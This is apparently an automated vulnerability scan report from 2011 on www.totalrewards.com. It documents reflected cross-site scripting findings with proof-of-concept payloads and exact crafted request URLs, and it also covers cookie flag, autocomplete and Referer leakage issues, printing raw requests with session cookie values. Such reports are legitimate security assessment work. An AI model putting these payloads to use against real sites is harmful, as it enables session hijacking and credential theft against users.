Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 858d3<script>alert(1)</script>e6103e976c7 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:09:55 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>HTTP Proxy E ...[SNIP]... <p style="color: LightGrey"> original URL requested [858d3<script>alert(1)</script>e6103e976c7] </p> ...[SNIP]...
The value of the accountId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0fc"><script>alert(1)</script>e93137e79ef was submitted in the accountId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /GlobalLogin.jsp?referdomain=www.totalrewards.com&lastsync=1300278300127&source=brand&login=false&randomNumber=0.6642456234751404&accountId=bf0fc"><script>alert(1)</script>e93137e79ef HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 12:26:33 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the propCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbb7"%20a%3db%20ccdf35a4480 was submitted in the propCode parameter. This input was echoed as bbbb7" a=b ccdf35a4480 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /MakeReservation.do?action=promotions&propCode=FLVbbbb7"%20a%3db%20ccdf35a4480&rd=CZR_Promo_Homepage_160x80 HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:34 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=eum3fs45n1adzk55txmlh145; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:34 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43750
The value of the propcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c682"style%3d"x%3aexpression(alert(1))"b663ede571e was submitted in the propcode parameter. This input was echoed as 5c682"style="x:expression(alert(1))"b663ede571e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /hotel-reservations/?propcode=ATL+^+^+^+;view=ratecal+^+^+^+;packagecode=pgge15c682"style%3d"x%3aexpression(alert(1))"b663ede571e HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:12 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=4wh1nb45pwed03ani3mxjbzq; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:12 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44250
The value of the propcode request parameter is copied into the name of an HTML tag attribute. The payload 540f3%20style%3dx%3aexpression(alert(1))%2088a19e76535b44cd was submitted in the propcode parameter. This input was echoed as 540f3 style=x:expression(alert(1)) 88a19e76535b44cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the referdomain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d79"><script>alert(1)</script>28d58348b0a was submitted in the referdomain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /CookieHandler.jsp?set=&action=action_testcookie&lastsync=&referdomain=www.totalrewards.com34d79"><script>alert(1)</script>28d58348b0a&source=brand&randomNumber=0.802138916682452 HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 16 Mar 2011 12:26:41 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Content-Type: text/html; charset=ISO-8859-1 Location: https://www.totalrewards.com34d79"><script>alert(1)</script>28d58348b0a/GlobalLogin.jsp?referdomain=www.totalrewards.com34d79"><script>alert(1)</script>28d58348b0a&lastsync=1300278480717&source=brand&login=false&randomNumber=0.902513447368753&accountId= Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MakeReservation.do HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 16 Mar 2011 11:58:02 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000VLsX7F8lEGyw5WIJjabU-yS:12stmcshg;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Location: https://www.totalrewards.com/hotel-reservations/?originalpage=/MakeReservation.do Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TotalRewards/RewardsAndBenefits.do?page=overview HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; s_cc=true; s_sq=harconsumer%2Charrahsglobal%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:51:39 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000YcKOn5C5Bfe8bfLKWb1mAx0:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This page displays the overview of Total Rewards (trOverview.jsp) Cr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hotel-reservations/?propcode=CLV&type=ratecal&view=ratecal HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:04 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=wry2wn552wh5qfrdxkljtf45; path=/; HttpOnly Set-Cookie: mercury=Y; expires=Thu, 14-Jul-2011 11:58:04 GMT; path=/ Set-Cookie: mlite=N; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61058
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MakeReservation.do HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 16 Mar 2011 11:58:02 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000VLsX7F8lEGyw5WIJjabU-yS:12stmcshg;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Location: https://www.totalrewards.com/hotel-reservations/?originalpage=/MakeReservation.do Content-Language: en
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /TotalRewards/RewardsAndBenefits.do?page=overview HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; s_cc=true; s_sq=harconsumer%2Charrahsglobal%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:51:39 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000YcKOn5C5Bfe8bfLKWb1mAx0:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- This page displays the overview of Total Rewards (trOverview.jsp) Cr ...[SNIP]...
4. Password field with autocomplete enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.totalrewards.com
Path:
/GlobalLogin.jsp
Issue detail
The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:
pin
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Request
GET /GlobalLogin.jsp?referdomain=www.totalrewards.com&lastsync=1300278300127&source=brand&login=false&randomNumber=0.6642456234751404&accountId= HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 12:26:23 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form which POSTs data to the domain www.harrahs.com. The form contains the following fields:
action
primaryTRNumber
loggedIn
firstName
tierCode
memberJspPath
allowChild
childText
casinoSelected
neatSelectorFlg
regionCode
propCode
dropPropCode
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalMonth
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalDay
arrivalYear
arrivalYear
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureMonth
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureDay
departureYear
departureYear
numAdults
numAdults
numAdults
numAdults
numAdults
numChildren
numChildren
numChildren
numChildren
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /destinations/reno--tahoe/hotel-casinos/market-home.shtml HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive Referer: https://www.totalrewards.com/hotel-reservations/main/?propcode=ATL+%5E+%5E+%5E+;view=ratecal+%5E+%5E+%5E+;packagecode=pgge15c682%22style%3d%22x%3aexpression(alert(%22XSS%22))%22b663ede571e User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; JSESSIONID=0000BGIS15Vm0jRngbXGmwaLF8X:12stmcshg; s_cc=true; s_sq=harconsumer%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; ASP.NET_SessionId=y1dedq551vbd5j55g2sv5ujj; mercury=Y; mlite=N
Response
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 12:26:22 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link type="text/c ...[SNIP]... <!-- BEGIN MAKE RESERVATION MODULE --> <form name="CheckAvailabilityForm" action="https://www.harrahs.com/MakeReservation.do" id="makeResForm" method="post"> <INPUT type="hidden" value="FindRooms" name="action" /> ...[SNIP]...
6. Cross-domain Referer leakagepreviousnext There are 6 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /MakeReservation.do?action=promotions&propCode=FLV&rd=CZR_Promo_Homepage_160x80 HTTP/1.1 Host: www.totalrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:58:03 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000ZDjIHhCLn2lDSSGrgKjcNn3:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Flamingo Las Vegas - Limited Time Prom ...[SNIP]... </a> | <a href="https://www.harrahs.com/TotalRewards/RewardsAndBenefits.do?page=overview">Total Rewards</a> ...[SNIP]... <!-- netmining tag - added 3/18/2010 - tws --> <script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script> ...[SNIP]...
GET /TotalRewards/RewardsAndBenefits.do?page=overview HTTP/1.1 Host: www.totalrewards.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; s_cc=true; s_sq=harconsumer%2Charrahsglobal%3D%2526pid%253DHarrahs.com%252520Homepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.totalrewards.com/TotalRewards/RewardsAndBenefits.do%25253Fpage%25253Doverview_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 16 Mar 2011 11:51:39 GMT Server: Microsoft-IIS/6.0 p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa" X-Powered-By: ASP.NET Server: WebSphere Application Server/5.1 Set-Cookie: JSESSIONID=0000YcKOn5C5Bfe8bfLKWb1mAx0:14tlf4i0i;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Language: en
